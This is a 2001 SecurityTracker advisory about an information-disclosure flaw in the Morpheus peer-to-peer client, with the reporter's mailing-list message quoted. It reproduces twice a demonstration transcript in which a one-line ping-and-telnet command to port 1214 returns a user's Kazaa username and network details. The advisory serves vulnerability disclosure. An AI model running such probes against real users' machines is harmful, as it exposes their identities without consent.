Morpheus Peer-to-Peer Software Discloses User Name Information to Remote Users
|
|
SecurityTracker Alert ID: 1002311 |
|
SecurityTracker URL: http://securitytracker.com/id/1002311
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Sep 1 2001
|
Impact:
Disclosure of user information
|
Exploit Included: Yes
|
|
Description:
An information disclosure vulnerability was reported in Morpheus. The product discloses the user's name to remote users.
A remote user can connect to the Morpheus port and query the web daemon to determine the user's name.
A demonstration exploit transcript is provided:
foobar2:~# ping localhost | telnet morpheus.users.ip.address 1214
Trying morpheus.users.ip.address...
Connected to morpheus.users.ip.address.
Escape character is '^]'.
HTTP/1.0 501 Not Implemented
X-Kazaa-Username: {USER NAME HERE}
X-Kazaa-Network: MusicCity
X-Kazaa-IP: morpheus.users.ip.address:1214
X-Kazaa-SupernodeIP: 130.74.237.54:1214
Connection closed by foreign host.
foobar2:~#
|
Impact:
A remote user can determine the Morpheus username.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.musiccity.com/ (Links to External Site)
|
Cause:
Exception handling error
|
Underlying OS:
Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 28 Aug 2001 15:34:03 -0400
Subject: KaZaA / Morpheus Exploit??? (At least a way to get username and such)
|
Using FreeBSD 4.3 I tried the following...
foobar2:~# ping localhost | telnet morpheus.users.ip.address 1214
Trying morpheus.users.ip.address...
Connected to morpheus.users.ip.address.
Escape character is '^]'.
HTTP/1.0 501 Not Implemented
X-Kazaa-Username: {USER NAME HERE}
X-Kazaa-Network: MusicCity
X-Kazaa-IP: morpheus.users.ip.address:1214
X-Kazaa-SupernodeIP: 130.74.237.54:1214
Connection closed by foreign host.
foobar2:~#
Now I've tried this under W2Ks DOS and it does not produce the
same results... (It just times out)
Is this of any interest???
Jesse
|
|
